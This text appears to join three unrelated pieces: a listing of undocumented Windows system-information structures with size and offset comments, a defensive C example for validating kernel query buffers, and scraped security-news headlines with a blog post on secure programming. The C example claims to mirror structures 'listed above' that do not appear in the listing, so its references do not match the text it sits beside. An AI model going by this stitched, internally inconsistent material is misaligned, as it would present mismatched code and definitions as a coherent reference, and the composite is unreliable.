struct _SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION // Size=8
{
ULONG FlagsToEnable; // Size=4 Offset=0
ULONG FlagsToDisable; // Size=4 Offset=4
};
struct _SYSTEM_PREFETCH_PATCH_INFORMATION // Size=4
{
ULONG PrefetchPatchCount; // Size=4 Offset=0
};
struct _SYSTEM_VERIFIER_FAULTS_INFORMATION // Size=24
{
ULONG Probability; // Size=4 Offset=0
ULONG MaxProbability; // Size=4 Offset=4
UNICODE_STRING PoolTags; // Size=8 Offset=8
UNICODE_STRING Applications; // Size=8 Offset=16
};
struct _SYSTEM_SYSTEM_PARTITION_INFORMATION // Size=8
{
UNICODE_STRING SystemPartition; // Size=8 Offset=0
};
struct _SYSTEM_SYSTEM_DISK_INFORMATION // Size=8
{
UNICODE_STRING SystemDisk; // Size=8 Offset=0
};
struct _SYSTEM_CODEINTEGRITY_INFORMATION // Size=8
{
ULONG Length; // Size=4 Offset=0
ULONG CodeIntegrityOptions; // Size=4 Offset=4
};
struct _SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION // Size=4
{
ULONG Operation; // Size=4 Offset=0
};
struct _SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION // Size=8
{
ULONGLONG CycleTime; // Size=8 Offset=0
};
struct _SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // Size=36
{
PVOID KeyHandle; // Size=4 Offset=0
PUNICODE_STRING ValueNamePointer; // Size=4 Offset=4
ULONG_PTR RequiredLengthPointer; // Size=4 Offset=8
PUCHAR Buffer; // Size=4 Offset=12
ULONG BufferLength; // Size=4 Offset=16
ULONG Type; // Size=4 Offset=20
PUCHAR AppendBuffer; // Size=4 Offset=24
ULONG AppendBufferLength; // Size=4 Offset=28
UCHAR CreateIfDoesntExist; // Size=1 Offset=32
UCHAR TruncateExistingValue; // Size=1 Offset=33
};
struct _SYSTEM_VHD_BOOT_INFORMATION // Size=12
{
UCHAR OsDiskIsVhd; // Size=1 Offset=0
ULONG OsVhdFilePathOffset; // Size=4 Offset=4
WCHAR OsVhdParentVolume[1]; // Size=2 Offset=8
};
struct _SYSTEM_ERROR_PORT_TIMEOUTS // Size=8
{
ULONG StartTimeout; // Size=4 Offset=0
ULONG CommTimeout; // Size=4 Offset=4
};
struct _SYSTEM_LOW_PRIORITY_IO_INFORMATION // Size=40
{
ULONG LowPriReadOperations; // Size=4 Offset=0
ULONG LowPriWriteOperations; // Size=4 Offset=4
ULONG KernelBumpedToNormalOperations; // Size=4 Offset=8
ULONG LowPriPagingReadOperations; // Size=4 Offset=12
ULONG KernelPagingReadsBumpedToNormal; // Size=4 Offset=16
ULONG LowPriPagingWriteOperations; // Size=4 Offset=20
ULONG KernelPagingWritesBumpedToNormal; // Size=4 Offset=24
ULONG BoostedIrpCount; // Size=4 Offset=28
ULONG BoostedPagingIrpCount; // Size=4 Offset=32
ULONG BlanketBoostCount; // Size=4 Offset=36
};
struct _SYSTEM_VERIFIER_COUNTERS_INFORMATION // Size=168
{
SYSTEM_VERIFIER_INFORMATION Legacy; // Size=104 Offset=0
ULONG RaiseIrqls; // Size=4 Offset=104
ULONG AcquireSpinLocks; // Size=4 Offset=108
ULONG SynchronizeExecutions; // Size=4 Offset=112
ULONG AllocationsWithNoTag; // Size=4 Offset=116
ULONG AllocationsFailed; // Size=4 Offset=120
ULONG AllocationsFailedDeliberately; // Size=4 Offset=124
ULONG LockedBytes; // Size=4 Offset=128
ULONG PeakLockedBytes; // Size=4 Offset=132
ULONG MappedLockedBytes; // Size=4 Offset=136
ULONG PeakMappedLockedBytes; // Size=4 Offset=140
ULONG MappedIoSpaceBytes; // Size=4 Offset=144
ULONG PeakMappedIoSpaceBytes; // Size=4 Offset=148
ULONG PagesForMdlBytes; // Size=4 Offset=152
ULONG PeakPagesForMdlBytes; // Size=4 Offset=156
ULONG ContiguousMemoryBytes; // Size=4 Offset=160
ULONG PeakContiguousMemoryBytes; // Size=4 Offset=164
};
struct _SYSTEM_ACPI_AUDIT_INFORMATION // Size=8
{
ULONG RsdpCount; // Size=4 Offset=0
struct
{
ULONG SameRsdt: 1; // Size=4 Offset=4 BitOffset=0 BitCount=1
ULONG SlicPresent: 1; // Size=4 Offset=4 BitOffset=1 BitCount=1
ULONG SlicDifferent: 1; // Size=4 Offset=4 BitOffset=2 BitCount=1
};
};
struct _SYSTEM_BASIC_PERFORMANCE_INFORMATION // Size=16
{
ULONG AvailablePages; // Size=4 Offset=0
ULONG CommittedPages; // Size=4 Offset=4
ULONG CommitLimit; // Size=4 Offset=8
ULONG PeakCommitment; // Size=4 Offset=12
};
typedef union _QUERY_PERFORMANCE_COUNTER_FLAGS // Size=4 (bit-field struct and ul overlay the same 4 bytes)
{
struct
{
ULONG KernelTransition: 1; // Size=4 Offset=0 BitOffset=0 BitCount=1
ULONG Reserved: 31; // Size=4 Offset=0 BitOffset=1 BitCount=31
};
ULONG ul; // Size=4 Offset=0
} QUERY_PERFORMANCE_COUNTER_FLAGS;
struct _SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // Size=12
{
ULONG Version; // Size=4 Offset=0
QUERY_PERFORMANCE_COUNTER_FLAGS Flags; // Size=4 Offset=4
QUERY_PERFORMANCE_COUNTER_FLAGS ValidFlags; // Size=4 Offset=8
};
struct _SYSTEM_SESSION_BIGPOOL_INFORMATION // Size=24
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG Count; // Size=4 Offset=8
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; // Size=12 Offset=12
};
typedef enum _SYSTEM_PIXEL_FORMAT
{
SystemPixelFormatUnknown=0,
SystemPixelFormatR8G8B8=1,
SystemPixelFormatR8G8B8X8=2,
SystemPixelFormatB8G8R8=3,
SystemPixelFormatB8G8R8X8=4
} SYSTEM_PIXEL_FORMAT;
struct _SYSTEM_BOOT_GRAPHICS_INFORMATION // Size=32
{
LARGE_INTEGER FrameBuffer; // Size=8 Offset=0
ULONG Width; // Size=4 Offset=8
ULONG Height; // Size=4 Offset=12
ULONG PixelStride; // Size=4 Offset=16
ULONG Flags; // Size=4 Offset=20
SYSTEM_PIXEL_FORMAT Format; // Size=4 Offset=24
};
typedef struct _PEBS_DS_SAVE_AREA // Size=96
{
ULONGLONG BtsBufferBase; // Size=8 Offset=0
ULONGLONG BtsIndex; // Size=8 Offset=8
ULONGLONG BtsAbsoluteMaximum; // Size=8 Offset=16
ULONGLONG BtsInterruptThreshold; // Size=8 Offset=24
ULONGLONG PebsBufferBase; // Size=8 Offset=32
ULONGLONG PebsIndex; // Size=8 Offset=40
ULONGLONG PebsAbsoluteMaximum; // Size=8 Offset=48
ULONGLONG PebsInterruptThreshold; // Size=8 Offset=56
ULONGLONG PebsCounterReset0; // Size=8 Offset=64
ULONGLONG PebsCounterReset1; // Size=8 Offset=72
ULONGLONG PebsCounterReset2; // Size=8 Offset=80
ULONGLONG PebsCounterReset3; // Size=8 Offset=88
} PEBS_DS_SAVE_AREA;
typedef struct _PROCESSOR_PROFILE_CONTROL_AREA // Size=96
{
PEBS_DS_SAVE_AREA PebsDsSaveArea; // Size=96 Offset=0
} *PPROCESSOR_PROFILE_CONTROL_AREA;
struct _SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA // Size=8
{
PPROCESSOR_PROFILE_CONTROL_AREA ProcessorProfileControlArea; // Size=4 Offset=0
UCHAR Allocate; // Size=1 Offset=4
};
struct _SYSTEM_ENTROPY_TIMING_INFORMATION // Size=12
{
PVOID EntropyRoutine; // Size=4 Offset=0 VOID (* EntropyRoutine)(PVOID,ULONG)
PVOID InitializationRoutine; // Size=4 Offset=4 VOID ( * InitializationRoutine)(PVOID,ULONG,PVOID)
PVOID InitializationContext; // Size=4 Offset=8
};
struct _SYSTEM_CONSOLE_INFORMATION // Size=4
{
ULONG DriverLoaded: 1; // Size=4 Offset=0 BitOffset=0 BitCount=1
ULONG Spare: 31; // Size=4 Offset=0 BitOffset=1 BitCount=31
};
struct _SYSTEM_PLATFORM_BINARY_INFORMATION // Size=24
{
ULONGLONG PhysicalAddress; // Size=8 Offset=0
PVOID HandoffBuffer; // Size=4 Offset=8
PVOID CommandLineBuffer; // Size=4 Offset=12
ULONG HandoffBufferSize; // Size=4 Offset=16
ULONG CommandLineBufferSize; // Size=4 Offset=20
};
struct _SYSTEM_DEVICE_DATA_INFORMATION // Size=28
{
UNICODE_STRING DeviceId; // Size=8 Offset=0
UNICODE_STRING DataName; // Size=8 Offset=8
ULONG DataType; // Size=4 Offset=16
ULONG DataBufferLength; // Size=4 Offset=20
PVOID DataBuffer; // Size=4 Offset=24
};
typedef struct _PHYSICAL_CHANNEL_RUN // Size=32
{
ULONG NodeNumber; // Size=4 Offset=0
ULONG ChannelNumber; // Size=4 Offset=4
ULONGLONG BasePage; // Size=8 Offset=8
ULONGLONG PageCount; // Size=8 Offset=16
ULONG Flags; // Size=4 Offset=24
} PHYSICAL_CHANNEL_RUN;
struct _SYSTEM_MEMORY_TOPOLOGY_INFORMATION // Size=48
{
ULONGLONG NumberOfRuns; // Size=8 Offset=0
ULONG NumberOfNodes; // Size=4 Offset=8
ULONG NumberOfChannels; // Size=4 Offset=12
PHYSICAL_CHANNEL_RUN Run[1]; // Size=32 Offset=16
};
struct _SYSTEM_MEMORY_CHANNEL_INFORMATION // Size=40
{
ULONG ChannelNumber; // Size=4 Offset=0
ULONG ChannelHeatIndex; // Size=4 Offset=4
ULONGLONG TotalPageCount; // Size=8 Offset=8
ULONGLONG ZeroPageCount; // Size=8 Offset=16
ULONGLONG FreePageCount; // Size=8 Offset=24
ULONGLONG StandbyPageCount; // Size=8 Offset=32
};
struct _SYSTEM_BOOT_LOGO_INFORMATION // Size=8
{
ULONG Flags; // Size=4 Offset=0
ULONG BitmapOffset; // Size=4 Offset=4
};
struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // Size=72
{
LARGE_INTEGER IdleTime; // Size=8 Offset=0
LARGE_INTEGER KernelTime; // Size=8 Offset=8
LARGE_INTEGER UserTime; // Size=8 Offset=16
LARGE_INTEGER DpcTime; // Size=8 Offset=24
LARGE_INTEGER InterruptTime; // Size=8 Offset=32
ULONG InterruptCount; // Size=4 Offset=40
ULONG Spare0; // Size=4 Offset=44
LARGE_INTEGER AvailableTime; // Size=8 Offset=48
LARGE_INTEGER Spare1; // Size=8 Offset=56
LARGE_INTEGER Spare2; // Size=8 Offset=64
};
struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION // Size=24
{
GUID PolicyPublisher; // Size=16 Offset=0
ULONG PolicyVersion; // Size=4 Offset=16
ULONG PolicyOptions; // Size=4 Offset=20
};
struct _SYSTEM_SECUREBOOT_INFORMATION // Size=2
{
UCHAR SecureBootEnabled; // Size=1 Offset=0
UCHAR SecureBootCapable; // Size=1 Offset=1
};
struct _SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION // Size=1
{
UCHAR EfiLauncherEnabled; // Size=1 Offset=0
};
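Two idioms recur in the structures listed above: count-prefixed arrays declared with a one-element tail such as `Handles[1]` in `_SYSTEM_HANDLE_INFORMATION_EX`, and records chained by `NextEntryOffset` as in `_SYSTEM_SESSION_MAPPED_VIEW_INFORMATION` and `_SYSTEM_VERIFIER_INFORMATION`. A consumer of an NtQuerySystemInformation buffer that trusts the count or the offset without checking it against the number of bytes it actually received reads past the buffer, or spins forever on a chain that points backwards. The C program below is an added example and is not part of the original listing: it mirrors the 32-bit layouts from the comments above (20-byte mapped-view record, 28-byte handle entry, 8-byte handle header) with fixed-width types so the sizes hold on any host, and it runs over constructed sample buffers rather than real kernel output. The function names and sample values are the example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 32-bit layouts from the listing above, spelled with fixed-width types so that
 * sizeof() is 20 and 28 on every host. Type and function names are this example's own. */
typedef struct {
    uint32_t NextEntryOffset;
    uint32_t SessionId;
    uint32_t ViewFailures;
    uint32_t NumberOfBytesAvailable;
    uint32_t NumberOfBytesAvailableContiguous;
} MAPPED_VIEW_ENTRY;            /* mirrors _SYSTEM_SESSION_MAPPED_VIEW_INFORMATION, Size=20 */

typedef struct {
    uint32_t Object;            /* PVOID is 4 bytes in the 32-bit layout documented above */
    uint32_t UniqueProcessId;
    uint32_t HandleValue;
    uint32_t GrantedAccess;
    uint16_t CreatorBackTraceIndex;
    uint16_t ObjectTypeIndex;
    uint32_t HandleAttributes;
    uint32_t Reserved;
} HANDLE_ENTRY;                 /* mirrors SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, Size=28 */

#define HANDLE_INFO_HEADER 8    /* NumberOfHandles + Reserved; Handles[] starts at offset 8 */

/* Walk a NextEntryOffset chain without trusting the offsets: every record must fit in the
 * buffer, and every non-zero offset must advance by at least one full record, so a corrupt
 * offset can neither read past the end nor make the loop spin. Returns the number of
 * records visited, or -1 on a malformed chain. session_ids may be NULL when max_ids is 0. */
int walk_mapped_view_chain(const uint8_t *buf, size_t len,
                           uint32_t *session_ids, size_t max_ids)
{
    size_t pos = 0;
    int count = 0;
    for (;;) {
        MAPPED_VIEW_ENTRY e;
        if (len - pos < sizeof e) return -1;        /* record would overrun the buffer */
        memcpy(&e, buf + pos, sizeof e);            /* memcpy: no alignment assumptions */
        if ((size_t)count < max_ids) session_ids[count] = e.SessionId;
        count++;
        if (e.NextEntryOffset == 0) return count;   /* last record in the chain */
        if (e.NextEntryOffset < sizeof e) return -1;/* overlaps itself: would loop */
        if (e.NextEntryOffset > len - pos) return -1; /* jumps past the end */
        pos += e.NextEntryOffset;
    }
}

/* Validate a count-prefixed SYSTEM_HANDLE_INFORMATION_EX buffer: NumberOfHandles must agree
 * with the bytes actually returned. Dividing instead of multiplying keeps the comparison
 * free of integer overflow even on a 32-bit size_t. Returns the usable entry count or -1. */
long count_handle_entries(const uint8_t *buf, size_t len)
{
    uint32_t n;
    if (len < HANDLE_INFO_HEADER) return -1;
    memcpy(&n, buf, sizeof n);
    if (n > (len - HANDLE_INFO_HEADER) / sizeof(HANDLE_ENTRY)) return -1;
    return (long)n;
}

/* Copy out entry i; call only after count_handle_entries() accepted the buffer. */
HANDLE_ENTRY get_handle_entry(const uint8_t *buf, size_t i)
{
    HANDLE_ENTRY e;
    memcpy(&e, buf + HANDLE_INFO_HEADER + i * sizeof e, sizeof e);
    return e;
}

/* Constructed sample (not real kernel output): three mapped-view records for sessions
 * 0, 1 and 2, chained with NextEntryOffset 20, 20, 0. Returns the bytes written. */
size_t build_sample_chain(uint8_t *out, size_t cap)
{
    const MAPPED_VIEW_ENTRY recs[3] = {
        { 20, 0, 0, 0x10000, 0x8000 },
        { 20, 1, 2, 0x20000, 0x4000 },
        {  0, 2, 0, 0x30000, 0x1000 },
    };
    if (cap < sizeof recs) return 0;
    memcpy(out, recs, sizeof recs);
    return sizeof recs;
}

/* Constructed sample: a header claiming `claimed` handles followed by two real entries.
 * claimed=2 builds a consistent buffer; claimed=3 models a count that overruns it. */
size_t build_sample_handles(uint8_t *out, size_t cap, uint32_t claimed)
{
    const HANDLE_ENTRY entries[2] = {
        { 0x8a000000u, 4, 0x4, 0x1f0fff, 0, 7, 0, 0 },
        { 0x8a000100u, 4, 0x8, 0x100001, 0, 5, 2, 0 },
    };
    const uint32_t reserved = 0;
    size_t need = HANDLE_INFO_HEADER + sizeof entries;
    if (cap < need) return 0;
    memcpy(out, &claimed, 4);
    memcpy(out + 4, &reserved, 4);
    memcpy(out + HANDLE_INFO_HEADER, entries, sizeof entries);
    return need;
}
```

The same two checks apply to every `NextEntryOffset` or `Count`/`NumberOf...` structure in the listing: bound each record against the byte length you were handed, never against the count the buffer itself advertises, and reject offsets that do not move strictly forward.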
Facebook Reports a Potential Leak of User Data, (Sat, Jun 22nd)
Facebook recently received a report that may have allowed some user information (email or phon ...(more)...
[local] - FreeBSD 9.0-9.1 mmap/ptrace Privilege Escalation Exploit
To Be a Secure Developer, Learn the Fundamentals
When I studied computer science in college, the curriculum wasn’t designed to teach all the different programming languages with the goal of becoming as “multi-lingual” as possible. Instead, we focused on conceptual areas — data structures, machine structures, algorithms, etc. The languages with which you chose to illustrate those concepts were secondary to the concepts themselves. I believe most leading research universities emphasize concepts over mechanics in a similar fashion. However, some computer science departments focus on teaching particular languages rather than broad programming concepts. I always found this method of studying programming odd.
Language is simply syntax, and those trained in the concepts of programming should be able to pick any language up along the way. Think of it this way: if I asked a child to simply memorize multiplication tables through the 10s table, then he or she would know 5 × 5 = 25. But would the child be able to figure out that 11 × 12 = 132? Probably not, because in the process of memorizing the answer to each equation, he or she didn’t learn the concept behind multiplication. If the student thought about it long enough, he or she might notice the pattern of how multiplication works, but why teach it that way? Isn’t it smarter to teach the concept so students can figure out the answer to any problem, rather than only knowing the responses to the set of problems they were asked to memorize? In fact, this is exactly the rationale behind the Singapore Math approach, a teaching method that’s growing in popularity among US homeschooling families. Not surprisingly, Singapore is consistently ranked near the best in the world in mathematics achievement.
When I read the Forbes article “Lesson 1: How We Can All Be Great Developers”, my first reaction was: this makes a lot of sense. Teaching the concepts of programming will help future programmers be more creative, more innovative, and more efficient, which will benefit their employers greatly. Now imagine if, while learning these concepts, they were also taught the principles of secure programming. They would internalize security concepts to the point where asking “should I trust this input?” is as much second nature as asking “how can I optimize this loop?” As with multiplication tables, memorizing which APIs to use in every programming language is not important.
Of course, the other side of this coin is that programmers may enter the workforce with less knowledge of coding style. Employers may need to be patient as new developers get up to speed on a particular language. However, if a developer understands the foundations of programming, he or she should be able to pick up the particulars of any language quickly. And while that may mean productivity isn’t as high at first, it also means that once the developer has fully ramped up, he or she will ultimately be more productive and write more secure code in the long run.
Use Tor, Get Targeted By the NSA
Happy 20th Birthday, FreeBSD
65 Years Ago, Manchester's 'Baby' Ran Electronically Stored Program
Aaron's Law Would Revamp Computer Fraud Penalties
Linkedin DNS Hijack - Update, (Thu, Jun 20th)
Update
It looks like this issue stemmed from a DDoS mitigation ...(more)...